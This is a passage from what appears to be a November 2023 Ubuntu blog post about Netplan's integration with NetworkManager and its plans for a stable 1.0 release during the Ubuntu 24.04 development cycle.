Netplan has established itself as the proven network stack across all variants of Ubuntu – Desktop, Server, Cloud, or Embedded. It has been the default stack across many Ubuntu LTS releases, serving millions of users over the years. With the bidirectional integration between NetworkManager and Netplan the final piece of the puzzle is implemented to consider Netplan the “single source of truth” for network configuration on Ubuntu. With Debian choosing Netplan to be the default network stack for their cloud images, it is also gaining traction outside the Ubuntu ecosystem and growing into the wider open source community.

Within the development cycle for Ubuntu 24.04 LTS, we will polish the Netplan codebase to be ready for a 1.0 release, coming with certain guarantees on API and ABI stability, so that other distributions and 3rd party integrations can rely on Netplan’s interfaces. First steps into that direction have already been taken, as the Netplan team reached out to the Debian community at DebConf 2023 in Kochi/India to evaluate possible synergies.

Conclusion

Netplan can be used transparently to control a workstation’s network configuration and plays hand-in-hand with many desktop environments through its tight integration with NetworkManager. It allows for easy network monitoring, using common graphical interfaces and provides a “single source of truth” to network administrators, allowing for configuration of Ubuntu Desktop fleets in a streamlined and declarative way. You can try this new functionality hands-on by following the “Access Desktop NetworkManager settings through Netplan” tutorial.


If you want to learn more, feel free to follow our activities on Netplan.io, GitHub, Launchpad, IRC or our Netplan Developer Diaries blog on discourse.

on November 12, 2023 03:00 PM